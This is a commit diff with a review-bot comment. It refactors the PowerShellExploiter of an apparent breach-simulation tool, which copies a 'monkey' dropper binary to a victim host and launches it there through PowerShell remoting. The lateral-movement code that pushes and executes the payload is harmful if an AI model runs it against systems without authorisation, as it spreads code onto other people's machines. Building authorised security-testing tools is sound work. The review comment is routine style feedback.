Agent: Extract method _build_monkey_execution_command
parent
1928f1b9bc
commit
aef8f2e37a
|
@ -121,15 +121,15 @@ class PowerShellExploiter(HostExploiter):
|
||||||
|
|
||||||
self._write_virtual_file_to_local_path()
|
self._write_virtual_file_to_local_path()
|
||||||
|
|
||||||
self.monkey_path_on_victim = (
|
monkey_path_on_victim = (
|
||||||
self._config.dropper_target_path_win_32
|
self._config.dropper_target_path_win_32
|
||||||
if self.is_32bit
|
if self.is_32bit
|
||||||
else self._config.dropper_target_path_win_64
|
else self._config.dropper_target_path_win_64
|
||||||
)
|
)
|
||||||
is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
|
is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim)
|
||||||
|
|
||||||
if is_monkey_copy_successful:
|
if is_monkey_copy_successful:
|
||||||
self._run_monkey_executable_on_victim()
|
self._run_monkey_executable_on_victim(monkey_path_on_victim)
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -153,28 +153,17 @@ class PowerShellExploiter(HostExploiter):
|
||||||
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
||||||
monkey_local_file.write(monkey_virtual_file.read())
|
monkey_local_file.write(monkey_virtual_file.read())
|
||||||
|
|
||||||
def _copy_monkey_binary_to_victim(self) -> bool:
|
def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
|
||||||
try:
|
try:
|
||||||
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
|
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
|
||||||
return True
|
return True
|
||||||
except Exception:
|
except Exception:
|
||||||
return False
|
return False
|
||||||
finally:
|
finally:
|
||||||
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
||||||
|
|
||||||
def _run_monkey_executable_on_victim(self) -> None:
|
def _run_monkey_executable_on_victim(self, executable_path) -> None:
|
||||||
monkey_params = build_monkey_commandline(
|
monkey_execution_command = self._build_monkey_execution_command(executable_path)
|
||||||
target_host=self.host,
|
|
||||||
depth=get_monkey_depth() - 1,
|
|
||||||
vulnerable_port=None,
|
|
||||||
location=self.monkey_path_on_victim,
|
|
||||||
)
|
|
||||||
|
|
||||||
monkey_execution_command = RUN_MONKEY % {
|
|
||||||
"monkey_path": self.monkey_path_on_victim,
|
|
||||||
"monkey_type": DROPPER_ARG,
|
|
||||||
"parameters": monkey_params,
|
|
||||||
}
|
|
||||||
|
|
||||||
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
||||||
ps = PowerShell(pool)
|
ps = PowerShell(pool)
|
||||||
|
@ -182,3 +171,17 @@ class PowerShellExploiter(HostExploiter):
|
||||||
"name", "create"
|
"name", "create"
|
||||||
).add_parameter("ArgumentList", monkey_execution_command)
|
).add_parameter("ArgumentList", monkey_execution_command)
|
||||||
ps.invoke()
|
ps.invoke()
|
||||||
|
|
||||||
|
def _build_monkey_execution_command(self, executable_path) -> str:
|
||||||
|
monkey_params = build_monkey_commandline(
|
||||||
|
target_host=self.host,
|
||||||
|
depth=get_monkey_depth() - 1,
|
||||||
|
vulnerable_port=None,
|
||||||
|
location=executable_path,
|
||||||
|
)
|
||||||
|
|
||||||
|
return RUN_MONKEY % {
|
||||||
|
"monkey_path": executable_path,
|
||||||
|
"monkey_type": DROPPER_ARG,
|
||||||
|
"parameters": monkey_params,
|
||||||
|
}
|
||||||
|
|
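Review bot: `_run_monkey_executable_on_victim` and the new `_build_monkey_execution_command` take `executable_path` with no type annotation, while `_copy_monkey_binary_to_victim` in the same commit declares `dest: str`; writing `executable_path: str` in both keeps the three signatures consistent. The extracted helper also has no docstring, and a one-liner such as `"""Return the command line that launches the dropper located at executable_path."""` would record what the returned string is for. Because the first hunk turns `self.monkey_path_on_victim` into a local variable, any code outside the visible hunks that still reads that attribute would presumably raise AttributeError, so the remaining references are worth checking. The method edited by the first hunk begins above it, so its full body is not visible here.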